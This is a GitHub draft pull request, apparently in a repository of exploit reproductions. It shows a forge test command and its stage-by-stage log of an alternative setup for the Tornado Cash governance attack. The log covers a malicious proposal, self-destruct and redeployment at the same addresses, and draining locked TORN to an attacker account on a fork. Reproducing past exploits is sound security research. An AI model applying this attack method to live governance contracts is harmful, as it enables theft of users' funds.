Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Draft - Alternative setup for Tornado Cash Governance attack #67

Draft
wants to merge 1 commit into
base: master
Choose a base branch
from
Draft

Draft - Alternative setup for Tornado Cash Governance attack #67

wants to merge 1 commit into from

Conversation

nine-december
Copy link
Collaborator

Rationale

The following PR shows how the Tornado Cash attack would have succeeded even if the minions don't approve and lock zero torn when setting up the accounts.

Running:

forge test --match-contract=Exploit_TornadoCashGovernance -vvv

Outputs:

======== STAGE 0. DEPLOY FACTORY AND PROPOSAL - GET SOME TORN ========
  Proposal Factory deployed at: 0x728663deA5cFE23228d61A85a6696278dd5a0AE4
  Deploying initial proposal...
  Transient deployed at: 0xb49EBD4A1bd6d3633B9227D25164F33A8EB7786C
  Proposal 20 deployed at: 0x4AF4325d90a664889b2bEc9Ec53C44eEfB6D3089
  
======== STAGE 1. SUBMIT MALICIOUS PROPOSAL ========
  Submitting proposal...
  
======== STAGE 1.1 VOTE PROPOSAL ========
  Locking funds with voter...
  Funds successfully locked 

  Casting vote...
  Vote successfully casted
  
======== STAGE 2. DEPLOY AND PREPARE MULTIPLE ACCOUNTS ========
  MINIONS WON'T APPROVE AND LOCK ZERO TORN
  Deploying and preparing minion #1 at address: 0x9Da940b2Fd184E5c39CC0aE358B380C125a12158
  Deploying and preparing minion #2 at address: 0x60A5d1b2Ae271557c0da3f8dC4b4cFcb73D55784
  Deploying and preparing minion #3 at address: 0x0bA2c44fAc23fe39EbB66dF4aA02641C67372E78
  Deploying and preparing minion #4 at address: 0xfdd66B307434ADd7a7043075e30751f842Ec2f12
  Deploying and preparing minion #5 at address: 0xC31add2bAF18796DC6E7660EE4AB06b3E5571642
  
======== STAGE 3. DESTROY THE PROPOSAL AND TRANSIENT ========
  Triggering destruction of transient and proposal...
  Destroying proposal...
  Destroying transient...
  Successfully destroyed proposal and transient
  Fork Block Number: 17299106
  
======== STAGE 4. REDEPLOY THE PROPOSAL AND TRANSIENT ========
  Before Redeployment Code Size
  Transient: 0
  Proposal: 0 

  Deploying malicious proposal...
  Transient deployed at: 0xb49EBD4A1bd6d3633B9227D25164F33A8EB7786C
  Proposal 20 deployed at: 0x4AF4325d90a664889b2bEc9Ec53C44eEfB6D3089
  
After Redeployment Code Size
  Transient: 2548
  Proposal: 1061
  
======== STAGE 5. EXECUTE MALICIOUS PROPOSAL ========
  Executing malicious proposal...
  Execution successful
  
======== STAGE 6. DRAIN TORN FROM GOVERNANCE ========
  Draining TORN balance...
  Before Drain 
  Minion1 Locked Balance: 10000000000000000000000
  Minion2 Locked Balance: 10000000000000000000000
  Minion3 Locked Balance: 10000000000000000000000
  Minion4 Locked Balance: 10000000000000000000000
  Minion5 Locked Balance: 10000000000000000000000
  Attacker1 TORN Balance: 0
  
After Drain 
  Minion1 Locked Balance: 0
  Minion2 Locked Balance: 0
  Minion3 Locked Balance: 0
  Minion4 Locked Balance: 0
  Minion5 Locked Balance: 0
  Attacker1 TORN Balance: 50000000000000000000000

@nine-december nine-december changed the title DO NOT MERGE - SHOWCASE PURPOSES DO NOT MERGE - Alternative setup for Tornado Cash Governance attack May 29, 2023
@nine-december nine-december changed the title DO NOT MERGE - Alternative setup for Tornado Cash Governance attack Draft - Alternative setup for Tornado Cash Governance attack May 29, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
1 participant
@nine-december